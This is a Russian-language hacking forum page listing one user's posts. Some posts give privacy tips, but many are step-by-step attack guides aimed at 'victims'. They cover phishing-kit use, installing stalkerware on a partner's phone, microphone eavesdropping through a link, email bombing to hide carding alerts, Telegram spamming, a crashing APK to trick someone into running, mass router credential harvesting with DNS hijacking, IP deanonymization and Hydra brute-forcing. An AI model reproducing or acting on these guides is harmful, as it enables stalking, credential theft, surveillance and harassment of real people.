Перейти к содержимому


Контент пользователя roguevad

Найдено 147 записей от roguevad (Поиск ограничен от 05-Май 23)



#28263 Шифруем файлы прямо в браузере!

Отправлено по roguevad   14 Сентябрь 2021 - 02:09 в Делимся опытом.

Приветствую, хакеры! В данной статье я хочу рассказать вам о способе шифрования файлов прямо в браузере. Шифрование файла паролем — очень полезная вещь, когда нужно отправить важный документ по электронной почте или сохранить его в Google Drive. Если файл не зашифрован, его посмотрит любой злоумышленник. Надёжное шифрование же превращает документ в сложный код, который не расшифровать постороннему. 

 

Есть проблема: большинство онлайн-сервисов сохраняют ваши файлы себе на сервер. Редкое исключение — Hat.sh. Он шифрует данные прямо в браузере, не отправляя их себе на сервер. Код лежит в открытом доступе. Вы можете сами убедиться в этом.

 

Пользоваться инструментом очень просто: выбираем шифруемый файл, вводим или генерируем ключ шифрования и нажимаем Encrypt для шифрования и Decrypt для дешифрования.

Рекомендую использовать шифрование, особенно подобным образом. Это легко и удобно, а самое главное сильно повышает вашу безопасность в сети. Поэтому если не хотите скачивать специальные программы, то этот способ для вас.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28210 Шифруем жёсткий диск — защищаем свои данные!

Отправлено по roguevad   11 Июль 2021 - 12:27 в Делимся опытом.

Приветствую, хакеры! В этой небольшой статье хочу рассказать вам как сделать так, чтобы никто не украл ваши файлы, даже при получении физического доступа к накопителю компьютера, лучше зашифровать собственный диск. Как это сделать на трёх основных операционных системах:

 

Windows. Сама OS позволяет надёжно зашифровать жёсткий диск при помощи пароля или USB-ключа с использованием инструмента BitLocker. В этом материале рассказано, как использовать данный инструмент.

 

Mac OS. На Mac защитить информацию намного проще — в Finder открываем окно и, удерживая клавишу Control, в боковом меню нажимаем на объект, который нужно зашифровать. Дальше кликаем ещё на пару кнопок, следуя данной инструкции.

 

Linux. Процесс шифрования жёсткого диска на Linux проходит гораздо сложнее, чем на предыдущих OS: использовать нужно стандарт LUKS. По ссылке подробный туториал, как это сделать.

 

Для Windows, Mac OS и Linux также есть программа VeraCrypt. Она шифрует не только отдельные разделы жёсткого диска, но и целиком всю OS, очень удобная и полезная вещь.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28319 Шифруем вирус в картинку!

Отправлено по roguevad   15 Апрель 2022 - 11:20 в Делимся опытом.

cucM3e2.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как зашифровать вирус в картинку. OpenStego - программа с открытым исходным кодом, позволяющая зашифровать файл и спрятать его в картинку.

Одна из лучших программ для стеганографии.

 

Программа имеет консольный и удобный Java Swing графический интерфейс, поддерживается сокрытие данных в изображениях форматов bmp, wbmp, gif, jpeg (jpg) и png, для скрываемых данных поддерживается сжатие и защита информации паролем.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.




#28223 Что такое контрольные суммы (хеш-суммы)?!

Отправлено по roguevad   04 Август 2021 - 12:19 в Делимся опытом.

Приветствую, хакеры! Очень часто на сайтах разных дистрибутивов и софта можно увидеть колонки с названием SHA256Sum или MD5Sum. Это контрольные суммы (или хеш-суммы). Контрольные суммы позволяют проверить подлинность и целостность файла. Также, по контрольным суммам очень легко искать файлы в поисковых системах.

 

Зачем нужны контрольные суммы?

Например, если файл был скачан не полностью, или файл был частично поврежден или полностью подменен на выходе он будет иметь другую контрольную сумму.

 

Скачивая образ дистрибутива с сайта можно сверить контрольную сумму. При условии что все прошло без каких-либо происшествий с файлом контрольная сумма должна совпадать.  Это особо актуально, если приходится работать в небезопасных и нестабильных сетях. Значение контрольной суммы меняется, если хотя бы один бит файла изменился.

 

В Kali Linux есть две утилиты: sha256sum и md5sum. С названия становиться очевидным что первая утилита использует алгоритм SHA-256, а вторая — MD5. Иногда, на сайтах можно увидеть сразу две контрольных суммы файла, а иногда только одну.  Для проверки контрольных сумм достаточно выполнить команды:

   md5sum <filename>

   sha256sum <filename>

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28221 Что такое Brute force и как делать проверку на эту уязвимость с помощью прогр...

Отправлено по roguevad   29 Июль 2021 - 02:04 в Делимся опытом.

Brute force — это метод грубой силы, подбор [пароля] методом грубой силы атака, заключающаяся в поиске пароля из множества всех его возможных значений путём их полного перебора. Способ подбора паролей к компьютерной системе, в котором для получения хэшированных паролей используются автоматически генерируемые последовательности символов, т. е. перебираются их всевозможные комбинации до тех пор, пока пароль не будет подобран. При этом обычно учитывается наименьшая и наибольшая возможная длина пароля. 

Hydra — Утилита для подбора аутентификационных данных методом грубой силы (brute force). 

Burp Suite — это интегрированная платформа для выполнения тестов по безопасности веб-приложений. Её различные инструменты эффективно работают вместе для поддержки всего процесса тестирования, от составления карты сайта и анализа поверхности атаки приложения до поиска и эксплуатации уязвимостей безопасности. 

Команды для работы с приложением: 

R — Восстановить предыдущую прерванную/оборванную сессию

s — ПОРТ

— ЛОГИН (Единичный)

— ЛОГИН (Список)

— ПАРОЛЬ (Единичный)

P — ПАРОЛЬ (Список)

— Генерация паролей для брутфорса, наберите “-x -h” для помощи

o — ФАЙЛ

f — Выйти, когда пара логин/пароль подобрана

t — ЗАДАЧИ

w — ВРЕМЯ

F — Элемент, который укажет на не успешную авторизацию

H — Куки

И так, с инструментами ознакомились. Теперь давайте приступим к настройке всего флоу, чтоб можно было подобрать нужные нам данные.

 1. Для начала подготовим пул данных логинов(мыл) и паролей

 2. Откроем наш веб сайт, который мы проверяем в каком либо браузере

 3. Включаем Burp Suite 

Во вкладке Proxy->Intercept включаем кнопку Intercept is on

zYeYrEH-AEM.jpg?size=800x348&quality=96&

 

Во вкладке Proxy->Oprions настраиваем прокси на приложуху и на браузер в котором открыли сайт, чтоб перехватить запрос, который пойдет, при попытке войти.

Zsg_QeI1WbI.jpg?size=800x463&quality=96&

 

Во вкладку Proxy->Intercept->Raw получим все данные переданные при попытке авторизации через браузер

4. Идем в браузер и делаем какую-то авторизацию, которая будет не валидна, так как нам надо не только взять данные, которые передаются отправке запроса, но и нам нужно какою-то увидеть уведомляху, что авторизация не прошла, для того чтоб под нее подвязать нашу утилиту Hydra, чтоб она могла понимать авторизация прошла успешно или нет.

xuIkroYw81E.jpg?size=690x314&quality=96&

 

В данном примере у нас она такая. Можно взять даже часть с этого уведомления, 1 слово допустим.

ggqsS7GfvEE.jpg?size=800x298&quality=96&

 

5. Возвращаемся в Burp Suite и видим все нужные данные для формирования скрипта. Нам нужны такие типы данных с этого запроса:

- Какой тип запроса Post/Get

- Cookie пользователя

- Локаторы полей ввода и кнопки войти

scL4sUF2FVQ.jpg?size=800x381&quality=96&

 

6. Открываем консольку и начинаем лепить запросик. Последовательность операторов может быть любой. Но я расскажу какая у меня последовательность в этом запросе:

NztG8HTx7Zk.jpg?size=807x56&quality=96&s

 

hydra- вызов утилиты

-l либо -L логин либо их список

-p либо -P пароль либо их список

-f если хотите чтоб подбор закончился при первом нужном совпадении

-V показать в реалтайме как происходит подбор, какой логин к какому паролю из предоставленных списков

через какой протокол и какую тип запроса проходит при авторизации в данном случаи протокол http и запрос post-form

саб домен, в данном случаи /index/sub/ локаторы

OGjgnzDONOE.jpg?size=800x78&quality=96&s

 

F- в него вписать вывод при не валидных данных пользователя 

:H- кука 

7. Жмем запуск и ждем результатов 

Хорошо бы конечно, было бы если нас система заблочит как бота пытающегося взломать, но для этого есть мы, чтоб проверить на сколько наш проект защищен от таких штук. 

Как защитится:

  1. Добавить капчу 

2. Добавить двухэтапную аутентификацию 

3. Ввести лимиты на поступление запросов с одного IP

 

 




#28279 Что может дать знание IP-адреса

Отправлено по roguevad   10 Март 2022 - 12:38 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, какие данные о нас сможет узнать другой человек, если он владеет данными о нашем IP и что вы можете с ними сделать.

 

Для целей выяснения информации о жертве злоумышленники чаще всего используют достаточно простые в использовании инструменты, о которых мы вам и расскажем.

 

Сервисы:

 

1. IP-score ТЫК сервис для проверки вашего IP на наличие его в blacklists.

2. HTMLweb ТЫК сервис, позволяющий запросто определить страну, город и даже ваш район по IP.

3. ipqualityscore ТЫК сайт предоставляет данные об использовании данным пользователем информации прокси, VPN и Тor.

4. iknowwhatyoudownload ТЫК позволяет получить информацию об использовании торрент ресурсов. А также создать зараженную ссылку и отправить ее владельцу IP.

5. Xspider-77 ТЫК сервис для получения информации об уязвимостях системы и о занятых портах.

6. Shadow Security Scanner ТЫК сервис позволяющий определить вашу ОС, а также название вашего ПК, а также точную дату и время на нем.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28225 Что видит ваш провайдер, когда вы подключены к VPN.

Отправлено по roguevad   07 Август 2021 - 02:02 в Делимся опытом.

Приветствую, хакеры! К VPN подключаются в том числе, чтобы ускорить и обезопасить соединение — пользователям не нравится, что теоретически кто угодно может отслеживать обычный трафик и видеть, какие файлы вы скачивали, куда заходили и зачем. Но разберемся, что же видит ваш провайдер при подключении через виртуальную частную сеть.

Под конфиденциальной информацией будем понимать не только переписку с другими пользователями, но и посещенные сайты, скаченные файлы, историю поиска.

Что увидит провайдер при VPN-подключении:

  • VPN-соединение: провайдер увидит подключение к VPN-серверу, но не будет знать, что вы делаете в сети. Информация зашифрована и для ISP недоступна. 
  • IP-адрес сервера: провайдер сможет понять, что от пользователя уходят какие-то данные к серверу VPN, но дальнейший маршрут пакетов данных ему неизвестен. 
  • Использование трафика: провайдер может узнать объем принятой и отправленной информации, но не ее содержание. 
  • Время соединения: ISP увидит, когда вы подключились к интернету и вышли из сети. 
  • Протоколы и порты VPN: провайдер поймет, что используется VPN, поскольку будут задействованы порты и протоколы, характерные для виртуальных частных сетей.

 

При VPN-подключении провайдер не увидит вашей конфиденциальной информации

Чего провайдер не увидит: 

  • сайты, которые вы посещали, 
  • файлы, которые вы скачивали, 
  • что вы публиковали в социальных сетях, 
  • историю поиска.

Конечно, виртуальная частная сеть не гарантирует 100% анонимность в сети, но дает высокую степень защиты и сохранения конфиденциальности информации. Провайдер может понять, что пользователь использует технологию VPN, но что именно вы делаете, куда заходите, что ищете, пишете, отправляете и скачиваете, для него останется тайной.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28248 Ходи без слежки: карты, которые не собирают данные

Отправлено по roguevad   31 Август 2021 - 12:41 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать, как ты можешь использовать карты без слежки, без собирания ваших данных. Карты, которыми вы пользуетесь, присваивают индивидуальные трекеры, просят зарегистрироваться, постоянно присылают push-уведомления. Короче говоря, собирают о вас все данные, чтобы показывать персонализированную рекламу. И им есть очень хорошая и главное безопасная альтернатива.

 

На днях основатели MapsMe (MapsWithMe) запустили бесплатную open-source версию проекта — Organic Maps. Приложение отличается особой конфиденциальностью: нет рекламы, регистрации, уведомлений, а ваши личные данные почти не собираются и никому не передаются.

 

Больше того, Organic Maps экономят заряд смартфона и отлично работают без интернета. Только на этих картах отмечены места, которые вы никогда не найдёте в Google Maps или Яндекс.Картах. Например, неизвестные пешеходные тропы и детские площадки. Карты создают тысячи волонтёров со всего мира, которые добавляли эти скрытные места. Поэтому используя эти карты, можно не беспокоится за безопасность ваших данных.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28295 Учимся спамить сообщениями в Telegram!

Отправлено по roguevad   28 Март 2022 - 01:19 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как спамить сообщениями в Telegram. У меня для вас свежий и весьма продвинутый спамер под названием Spmme, который имеет широкий функционал. В его функции входит: бесконечный спам текстом, сообщениями о сделанном скриншоте, а также возможность спамить в логги групп. Спамер работает, как на Termux, так и на Windows.

 

1. Для установки используем:

    apt update && apt upgrade

   $ pkg install git

   $ apt install python 

   $ git clone https://github.com/lamer112311/Spmme

   $ cd Spmme

   $ bash install.sh

   $ python spmme.py

2. После установки нужно пройти регистрацию на my.telegram.org и получить api id, api hash. Затем ввести полученные данные в терминал и указать номер. Так, можно легко заспамить своего друга сотнями сообщений.

 

Вот таким простым способом, вы можете спамить сообщения в телеграме. Это очень простой и эффективный метод, поэтому если вам необходимо кого-то заспамить, то выбирайте этот способ и вы не пожалеете, самое главное правильно установить все необходимые компоненты.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28208 Узнаём пароли от всех WiFi города

Отправлено по roguevad   09 Июль 2021 - 02:46 в Делимся опытом.

IP-диапазоны

Итак, приступим. Для начала нам нужны IP-диапазоны, тут несколько путей:

1) Диапазоны по городам

Заходим например на https://4it.me/getlistip вбиваем название города и копируем полученный результат

M5CdK2g3QMY.jpg?size=660x653&quality=96&

 

2) Нам нужны ip определённого провайдера

Заходим на https://2ip.ua/ru/se...ice/provider-ip в строку поиска вбиваем либо уже известный ip (например вы решили просканить своего провайдера, можете смело вбивать свой ip) либо вписываете сайт провайдера (гугл поможет).

Io8AouPe7l8.jpg?size=807x450&quality=96&

 

Программа Router Scan 

Нам нужен софт - RouterScan. С помощью него мы и будем сканить диапазоны.

Данный софт советую использовать на виртуалке/дедике, так как на вирустотале вот такая картина:

1fea5f8c48a1f9f1fed7d.png

 

Ну, Windows на виртуальную машину сможет поставить совершенно любой человек. Так что думаю, что тут особых проблем возникнуть не должно.

Далее запускаем софт.

Удаляем диапазоны в колонке, нажимаем ''E'' и вставляем ранее скопированные порты.

Порты можно добавить, но программой выставлены самые распространенные, поэтому больше в настройках ничего не менял

cdbdaad04fdf3a3474d5b.jpg

 

Стартуем.....ждем, курим, пьем чай/пиво и т.д. Часика через 1-3 подходим и видим похожую картину:

7c6e05ac469a561d39bf1.jpg

 

За три часа более 400 уязвимых роутера.

В колонке ''key'' наш пароль

Нажимаем на понравившийся айпи правой кнопкой и выбираем ''открыть в браузере'' открывается админка роутера, вводим лог и пас(если надо)бывает что лог есть, а пасс не нашла прога, вероятнее всего что нужен только лог, а пароля не будет.

Далее уже сами решайте что с этим делать, можно подменит днс, можно настроить впн через этот роутер.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28921 Узнаем взломан ли ваш аккаунт

Отправлено по roguevad   13 Июнь 2022 - 02:43 в Делимся опытом.

fZ5Z744.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете узнать взломан ли какой-то ваш аккаунт. У Google есть полезная функция, которая поможет узнать были ли ваши пароли скомпроментированы, а значит у кого-то точно появилась возможность войти в ваши аккаунты.

 

Чтобы проверить свои пароли:

1. Переходим по ссылке в диспетчер паролей Google.

2. В окне проверки паролей нажимаем «Перейти на страницу проверки паролей».

3. Нажимаем синюю кнопку «Проверить пароли».

4. Далее нужно подтвердить свою личность и получить отчет с анализом.

 

В отчете вы узнаете насколько ваши пароли надежны, не были ли они похищены и не используете ли вы одинаковые пароли в разных сервисах.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28215 Узнаем IP пользователя через Вконтакте

Отправлено по roguevad   16 Июль 2021 - 01:39 в Делимся опытом.

Приветствую, хакеры! Сегодня мы научимся "деанонить" юзеров ВК, а именно - узнавать их IP-адрес. В данной ситуации фейк страница не спасёт, но спасёт обычный VPN/proxy.

 

XV08DQ3LM0U.jpg?size=807x807&quality=96&

 

Вот Вам мини-гайд о том как заполучить этот самый ip. Сам ВК его пока не показывает (Ключевое слово ПОКА). Значит будем добывать его сами (что очень легко).

Для данных деяний нам понадобится:

  • Прямые руки и мозг (Куда же без этого)
  • Программа Wireshark
  • Плагин npcap

Приступим:

Скачиваем программу wireshark c офф сайта

Заходим и выбираем наше текущее подключение к интернету (У меня это Ethernet у вас может быть другое название)

w-Ma7lXXe88.jpg?size=807x430&quality=96&

 

w-Ma7lXXe88.jpg?size=807x430&quality=96&

 

Далее начинаем захват трафика, нажав правой кнопкой мыши по текущему подключению и выбрав захват. После чего советую резко остановить захват пакетов, нажав на красный квадратик слева сверху (так будет удобнее искать необходимую нам строку с ip адресом)

_UUBJgCigIY.jpg?size=505x56&quality=96&s

 

Далее звоним жертве, заранее запустив захват пакетов, нажав на плавник акулы(самое главное, чтобы жертва приняла звонок, иначе ничего не выйдет). Также советую закрыть все вкладки и использовать браузер, который не отправляет ненужные пакеты туда сюда, к примеру тот же edge.

sVpv-DgtFOA.jpg?size=271x77&quality=96&s

 

После того как жертва ответила, идём останавливать захват пакетов всё тем же квадратиком и приступаем к поиску ip адреса.

Собственно поиск. После остановки листаем по всему логу и ищем подобную строку:

ufs1-GgKFB0.jpg?size=423x28&quality=96&s

 

Тут у нас указан исходящий от нашего ip пакет данных на принимающий ip жертвы. И дабы убедиться, что это ip жертвы, а не левый ip, нам достаточно пролистнуть ниже, где мы увидим обильный обмен пакетами данных между нашим ip и тем же ip, что мы видели раньше.

JUkl7kGvy0k.jpg?size=725x247&quality=96&

 

 

 




#28517 Удобный способ очистки метаданных на изображении

Отправлено по roguevad   05 Май 2022 - 12:59 в Делимся опытом.

cnwy3yu.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том как вы можете удобно и быстро очистить метаданные с фотографии. Изображения не такие безобидные, какими многим кажутся. Каждая картинка таит в себе скрытую информацию вплоть до местоположения её создания и модели устройства.

 

Поэтому если по неосторожности скинуть человеку фото, то при желании он легко сможет извлечь из него много интересных данных

 

Предотвратить такой исход можно, воспользовавшись платформой Imgonline.com. От вас требуется лишь загрузить фотографию — всё остальное сделает сервис, после чего пришлёт уже готовую версию изображения.

 

Обработанный файл может весить меньше за счёт удаления дополнительной информации, что выступает в роли дополнительного плюса. Но за качество самого изображения переживать не стоит — оно останется точно таким же, каким было изначально.

 

Поэтому если вы беспокоитесь за свою безопасность и анонимность при отправлении фотографий, то рекомендую использовать данный сервис, чтобы удалить какие-либо следы с фотографии.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28233 Убиваем телефон с помощью fork-бомбы

Отправлено по roguevad   15 Август 2021 - 12:32 в Делимся опытом.

Приветствую, хакеры! В этой статье я хочу рассказать вам как можно убить телефон при помощи fork-бомбы. Это хороший и действенный метод, но он весьма опасен для устройства. fork-бомба — вредоносная или ошибочно написанная программа, бесконечно создающая свои копии.

 

Выполнение такой программы вызывает большую нагрузку вычислительной системы или даже отказ в обслуживании вследствие нехватки системных ресурсов.

 

Для начала необходимо обновить пакеты Termux, вводим команду:

   pkg update && pkg upgrade

 

Устанавливаем все необходимые библиотеки:

   pkg install git 

 

Далее клонируем инструмент с репозитория GitHub:

   git clone https://github.com/Terror696/Vitus2.0

 

Переходим в директорию инструмента с помощью данной команды:

   cd Vitus2.0

 

В директории будет находится файл VirtualXposed.apk, который можно переместить во внутреннюю память телефона:

   cp VirtualXposed.apk /sdcard/

Теперь осталось предать данный файл целевому пользователю, и под любым предлогом заставить нашу жертву запустить его, после этого его телефон перестанет функционировать.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28754 ТОП-5 инструментов для защиты данных!

Отправлено по roguevad   25 Май 2022 - 03:18 в Делимся опытом.

apVfrSJ.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о ТОП-5 инструментах для защиты ваших данных. Шифрование — лучшая технология для защиты данных от злоумышленников, правительств, поставщиков услуг. Оно достигло такого уровня развития, что его практически невозможно взломать. Ну что, присмотримся поближе?

 

VeraCrypt — программа, которая шифрует разделы жёсткого диска и всю ОС. Если пользователь компьютера не знает пароль, доступ он не получит.

 

KeePass — самое надёжное приложение для хранения паролей. Всё шифруется и хранится локально на устройстве, пароли не уходят на сторонние сервера.

 

Whonix — операционная система, которая наделяет неуязвимостью. Она переводит весь интернет-трафик через Tor — IP-адрес и DNS точно не сольют.

 

ProtonMail — почтовый сервис с функцией шифрования писем.

 

SMS Activate — с помощью сервиса можно за копейки активировать аккаунты в разных соцсетях и мессенджерах.

 

Рекомендую использовать все эти инструменты и сервисы для улучшения вашей анонимности и безопасности в сети.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28289 ТОП-3 приложения для экстренной очистки смартфона

Отправлено по roguevad   20 Март 2022 - 01:07 в Делимся опытом.

Приветствую, хакеры! В данной статье я хочу рассказать о нескольких приложений для экстренного удаления всех файлов со смартфона. Для кого-то смартфон — жизнь. В стосорокамиллиметровой пластиковой коробочке хранится так много конфиденциальной информации, что шантажист может «схватить передоз». Его жалеть не нужно, а вот себя — очень желательно! К чему ведём? Пароль как единственное средство защиты — это не работает. К тому же некоторые пренебрегают даже такой простейшей мерой безопасности. В общем, как тебе такая механика: телефон попал в чужие руки — файлы удалились?

 

1. AutoWipe — делается полный wipe, если пароль для разблокировки несколько раз введён неправильно.

2. SecAddon — в непредвиденных обстоятельствах удаляет или шифрует файлы, которые пользователь выбрал заранее.

3. Ripple — «тревожная кнопка» для запуска «эффекта пульсации» во всех приложениях, которые настроены реагировать на панические события.

 

Собрать всех «мстителей» в одну «команду» или выбрать только одного, — это пусть каждый решает сам. Скажем одно: что бы ты ни выбрал, «Готэм» в надёжных руках

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28203 Становимся взломщиками WhatsApp и следим за своей девушкой

Отправлено по roguevad   28 Июнь 2021 - 12:55 в Делимся опытом.

Приветствую, хакеры! Хочу рассказать про приложение, которое способно записывать сообщения и в реальном времени отправлять их вам. Вы можете видеть все сообщения жертвы каждый раз, как только она заходит в онлайн. К сожалению, приложение платное, но доступен 7-ми дневный пробный период. Внизу вы можете наблюдать инструкцию о том, как установить и использовать эту софтину.

1. Ссылка на сайт - ikeymonitor.com, выбирайте полную версию и регистрируйтесь. 

d3a35b0efad2b5e6040a2.png

2. Выберите девайс жертвы и тип устройства, продолжайте регистрацию дальше. 

c1d36dcaafdb57b27f921.png

3. Проверьте почту, туда упадут данные для входа.

b2db4fc4d87790667168d.png

4. После входа вы попадете в панель, она выглядит следующим образом. 

2303d05270abbd4ed4859.png

5. Скачайте и установите приложение на устройство вашей жертве. 

97f08b99ad9255efdf39f.png

 Как установить приложение на телефон вашей жертвы - это уже ваши проблемы, используйте навыки СИ. После установки приложения вы получите возможность получать все сообщения в реальном времени, помимо этого вы так же сможете получать информацию с других приложений. 

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28202 Ставим мощную прослушку на чужой телефон

Отправлено по roguevad   19 Июнь 2021 - 02:58 в Делимся опытом.

Приветствую, хакеры! Прослушивать мы будем с помощью обычной ссылки. Создание разберем внизу, но для генерации ссылки обязательно отключите wifi, включите точку доступа и при этом у вас должен быть мобильный интернет.

 

Приступим:

1. Запускаем термукс и вводим данные команды:

• pkg upgrade

• pkg upgrade

• pkg install git 

• pkg install php

• git clone https://github.com/t...choice/sayhello

• git clone https://github.com/M...sa/termux-ngrok

• cd termux-ngrok

• ./termux-ngrok.sh (после этого пишите Y)

• cd

• cd usr

• cd bin

• cp ngrok /data/data/com.termux/files/home/sayhello/

• cd sayhello

• chmod +x sayhello.sh

• ./sayhello.sh

 

2. После этого у вас откроется "SayHello". 

Выбираем в ней Ngrok-02 и спустя пару секунд cгенерируется нужная нам ссылка, на скриншоте – ТЫК она обведена в красный овал, её нужно будет отправить жертве, и если она разрешит доступ к микрофону, то в Termux будут писаться Audio file received. 

 

3. Для того, чтобы перенести во внутреннюю память аудио напишите:

• termux-setup-storage

• cp (название аудио файла, посмотреть название можно написав ls) /storage/emulated/0/

 

После этого аудио файлы сохранятся в формате .wav, а найти их можно во внутренней памяти.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28540 Список полезных onion сайтов в сети TOR

Отправлено по roguevad   07 Май 2022 - 01:25 в Делимся опытом.

JYuXBnT.png

 

Приветствую, хакеры! В данной небольшой статье я хочу дать вам список полезных onion сайтов в сети TOR. В этом списке есть поисковики, почтовые сервисы и прочие полезные вещи, которые могут вам пригодится при посещении Даркнета.

Поисковики по Даркнету:

http://xmh57jrzrnw6insl.onion/

http://s42qgnh4kesd5odo.onion/

http://hss3uro2hsxfogfq.onion/

http://searchl57jlgob74.onion/

http://gjobqjj7wyczbqie.onion/

http://msydqstlz2kzerdg.onion/

 

Почтовые сервисы в Даркнете:

http://sigaintevyh2rzvw.onion/

http://lelantoss7bcnwbv.onion/

http://ncikv3i4qfzwy2qy.onion/

http://torbox3uiot6wchz.onion/

http://mail2tor2zyjdctd.onion/

 

Хостинг в Даркнете:

http://hostzdcvmuqacom4.onion/

http://hosting6iar5zo7c.onion/

http://kowloon5aibdb...n/services.html

 

Временное размещение файлов в Даркнете:

http://popfilesxuru7lsr.onion/

http://twlba5j7oo5g4kj5.onion/

http://nzxj65x32vh2fkhk.onion/

http://cryptorffquolzz6.onion/

http://zerobinqmdqd236y.onion/

http://pastagdsp33j7aoq.onion/

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28787 Спамим email жертвы

Отправлено по roguevad   28 Май 2022 - 02:42 в Делимся опытом.

RLneR9A.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как вы можете спамить на электронную почту жертвы. Утилита Emailspam позволит мощно заспамить почтовый ящик жертвы. Помимо подгорания стула у жертвы, утилита имеет и прикладной характер, к примеру, спамерами часто пользуется кардеры, для того, что бы жертва не заметила в общем потоке инфошлака сообщения о покупке с ее платежных средств.

 

Установка:

 

   $ pkg update

   $ pkg install python

   $ pkg install python2

   $ pkg install python3

   $ pkg install git

   $ pip3 install colorama requests

   $ git clone https://github.com/a...icial/emailspam

   $ cd emailspam

 

Запуск:

 

   $ python3 main.py

 

После открытия утилиты, в строке "Type victim`s email here:" вводим почту, на которую хотим сделать спам атаку. Далее в строке "Type threads here (for example: 10):" вводим 10, нажимаем Enter и после этого на указанную почту начнётся спам атака.

 

Пользуйтесь, пока инструмент в рабочем состоянии, весьма неплохая и эффективная утилита, которая поможет вам для отправки большого количества писем.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28335 Создаём фишинговые ресурсы в 2 клика

Отправлено по roguevad   20 Апрель 2022 - 01:00 в Делимся опытом.

zpo5Xs8.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том как вы можете создать фишинговый сайт за пару кликов. JKNET — это новая, бесплатная фишинг панель. С помощью неё можно с лёгкостью создать фишинг сайт, и все данные спокойно будут храниться в профиле. Присутствует очень огромный список фишинг сайтов, игры/кошельки/соц сети!

 

1. Переходим по ссылке;

2. Регистрируемся, после чего входим в аккаунт;

3. После входа жмём «Фейк ссылки» в самом верху;

4. Ищем интересующий нас сайт. Как выбрали, чуть ниже будет ссылка, которую мы и отправляем жертве;

5. Как только жертва введёт данные, мы их сразу же можем посмотреть в разделе «Главная»;

6. Поздравляю, вы великолепны!

 

Помимо введенных данных, мы также узнаем IP, точное время, разрешение экрана жертвы, OC, Страну и Город. Как всегда строго в ознакомительных целях.

 

 

 




#28420 Создаём фишинговые ресурсы

Отправлено по roguevad   27 Апрель 2022 - 08:57 в Делимся опытом.

sEGV1fy.png

 

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам о том, как можно быстро создавать фишинговые ресурсы. JKNET — это новая, бесплатная фишинг панель. С помощью неё можно с лёгкостью создать фишинг сайт, и все данные спокойно будут храниться в профиле. Присутствует очень огромный список фишинг сайтов, игр, кошельков, соц.сети.

 

1. Переходим по ссылке;

2. Регистрируемся, после чего входим в аккаунт;

3. После входа жмём «Фейк ссылки» в самом верху;

4. Ищем интересующий нас сайт. Как выбрали, чуть ниже будет ссылка, которую мы и отправляем жертве;

5. Как только жертва введёт данные, мы их сразу же можем посмотреть в разделе «Главная»;

 

Помимо введенных данных, мы также узнаем IP, точное время, разрешение экрана жертвы, OC, Страну и Город.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.




#28490 Создание собственного VPN-сервиса

Отправлено по roguevad   02 Май 2022 - 02:05 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать вам как вы можете создать собственный VPN сервис. Сегодня вопрос о VPN становятся крайне важными, а доверие к сторонним VPN не такое большое, как хотелось бы, не всегда они готовы предоставить вам безопасность. VPN-сервисы сохраняют вашу историю браузера и часто сливают эти данные. Чтобы избежать утечек, можно создать VPN на собственном сервере — это легко сделать даже без знаний программирования. Понадобится сервис Outline Manager. Единственный нюанс: он стоит $5 в месяц, но первые 2 месяца бесплатные.

 

 - Устанавливаем программу на компьютер с Windows, Linux  или MacOS;

- Выбираем хостинг провайдера (попробуйте Digital Ocean);

- Регистрируемся и вводим платежные данные;

- Выбираем ближайшую к себе страну;

- Нажимаем «Add Key»;

- Отправляем себе ссылку для доступа к VPN;

- Устанавливаем приложение Outline на смартфон — Android или iOS. Доступно также на ПК, ссылки для скачивания здесь;

- Логинимся. Всё готово! На панели управления вы увидите, сколько трафика вы использовали и сколько устройств используют ваш VPN;

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28772 Скрипт для фишинга социальных сетей

Отправлено по roguevad   27 Май 2022 - 02:00 в Делимся опытом.

zYUU76n.png

 

